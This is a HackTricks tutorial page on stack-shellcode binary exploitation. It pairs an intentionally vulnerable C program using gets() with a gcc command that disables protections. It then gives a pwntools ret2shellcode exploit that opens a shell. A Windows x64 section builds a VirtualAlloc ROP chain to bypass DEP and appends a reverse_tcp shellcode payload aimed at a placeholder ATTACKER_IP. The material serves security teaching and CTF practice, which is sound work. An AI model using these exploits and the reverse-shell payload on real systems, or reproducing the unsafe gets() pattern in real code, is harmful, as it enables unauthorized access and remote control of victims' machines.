Stack Shellcode

Reading time: 8 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Stack shellcode is a technique used in binary exploitation where an attacker writes shellcode to a vulnerable program's stack and then modifies the Instruction Pointer (IP) or Extended Instruction Pointer (EIP) to point to the location of this shellcode, causing it to execute. This is a classic method used to gain unauthorized access or execute arbitrary commands on a target system. Here's a breakdown of the process, including a simple C example and how you might write a corresponding exploit using Python with pwntools.

C Example: A Vulnerable Program

Let's start with a simple example of a vulnerable C program:

c
#include <stdio.h>
#include <string.h>

void vulnerable_function() {
    char buffer[64];
    gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
    vulnerable_function();
    printf("Returned safely\n");
    return 0;
}

This program is vulnerable to a buffer overflow due to the use of the gets() function.

Compilation

To compile this program while disabling various protections (to simulate a vulnerable environment), you can use the following command:

sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
  • -fno-stack-protector: Disables stack protection.
  • -z execstack: Makes the stack executable, which is necessary for executing shellcode stored on the stack.
  • -no-pie: Disables Position Independent Executable, making it easier to predict the memory address where our shellcode will be located.
  • -m32: Compiles the program as a 32-bit executable, often used for simplicity in exploit development.

Python Exploit using Pwntools

Here's how you could write an exploit in Python using pwntools to perform a ret2shellcode attack:

python
from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()

This script constructs a payload consisting of a NOP slide, the shellcode, and then overwrites the EIP with the address pointing to the NOP slide, ensuring the shellcode gets executed.

The NOP slide (asm('nop')) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the p32() argument to the starting address of your buffer plus an offset to land in the NOP slide.

Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode)

On modern Windows the stack is non-executable (DEP/NX). A common way to still execute stack-resident shellcode after a stack BOF is to build a 64-bit ROP chain that calls VirtualAlloc (or VirtualProtect) from the module Import Address Table (IAT) to make a region of the stack executable and then return into shellcode appended after the chain.

Key points (Win64 calling convention):

  • VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
    • RCX = lpAddress → choose an address in the current stack (e.g., RSP) so the newly allocated RWX region overlaps your payload
    • RDX = dwSize → large enough for your chain + shellcode (e.g., 0x1000)
    • R8 = flAllocationType = MEM_COMMIT (0x1000)
    • R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40)
  • Return directly into the shellcode placed right after the chain.

Minimal strategy:

  1. Leak a module base (e.g., via a format-string, object pointer, etc.) to compute absolute gadget and IAT addresses under ASLR.
  2. Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) and a call/jmp [VirtualAlloc@IAT]. If you lack direct pop r8/r9, use arithmetic gadgets to synthesize constants (e.g., set r8=0 and repeatedly add r9=0x40 forty times to reach 0x1000).
  3. Place stage-2 shellcode immediately after the chain.

Example layout (conceptual):

# ... padding up to saved RIP ...
# R9 = 0x40 (PAGE_EXECUTE_READWRITE)
POP_R9_RET; 0x40
# R8 = 0x1000 (MEM_COMMIT) — if no POP R8, derive via arithmetic
POP_R8_RET; 0x1000
# RCX = &stack (lpAddress)
LEA_RCX_RSP_RET    # or sequence: load RSP into a GPR then mov rcx, reg
# RDX = size (dwSize)
POP_RDX_RET; 0x1000
# Call VirtualAlloc via the IAT
[IAT_VirtualAlloc]
# New RWX memory at RCX — execution continues at the next stack qword
JMP_SHELLCODE_OR_RET
# ---- stage-2 shellcode (x64) ----

With a constrained gadget set, you can craft register values indirectly, for example:

  • mov r9, rbx; mov r8, 0; add rsp, 8; ret → set r9 from rbx, zero r8, and compensate stack with a junk qword.
  • xor rbx, rsp; ret → seed rbx with the current stack pointer.
  • push rbx; pop rax; mov rcx, rax; ret → move RSP-derived value into RCX.

Pwntools sketch (given a known base and gadgets):

python
from pwn import *
base = 0x7ff6693b0000
IAT_VirtualAlloc = base + 0x400000  # example: resolve via reversing
rop  = b''
# r9 = 0x40
rop += p64(base+POP_RBX_RET) + p64(0x40)
rop += p64(base+MOV_R9_RBX_ZERO_R8_ADD_RSP_8_RET) + b'JUNKJUNK'
# rcx = rsp
rop += p64(base+POP_RBX_RET) + p64(0)
rop += p64(base+XOR_RBX_RSP_RET)
rop += p64(base+PUSH_RBX_POP_RAX_RET)
rop += p64(base+MOV_RCX_RAX_RET)
# r8 = 0x1000 via arithmetic if no pop r8
for _ in range(0x1000//0x40):
    rop += p64(base+ADD_R8_R9_ADD_RAX_R8_RET)
# rdx = 0x1000 (use any available gadget)
rop += p64(base+POP_RDX_RET) + p64(0x1000)
# call VirtualAlloc and land in shellcode
rop += p64(IAT_VirtualAlloc)
rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT))

Tips:

  • VirtualProtect works similarly if making an existing buffer RX is preferable; the parameter order is different.

  • If the stack space is tight, allocate RWX elsewhere (RCX=NULL) and jmp to that new region instead of reusing the stack.

  • Always account for gadgets that adjust RSP (e.g., add rsp, 8; ret) by inserting junk qwords.

  • ASLR should be disabled for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.

  • Stack Canaries should be also disabled or the compromised EIP return address won't never be followed.

  • NX stack protection would prevent the execution of the shellcode inside the stack because that region won't be executable.

Other Examples & References

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks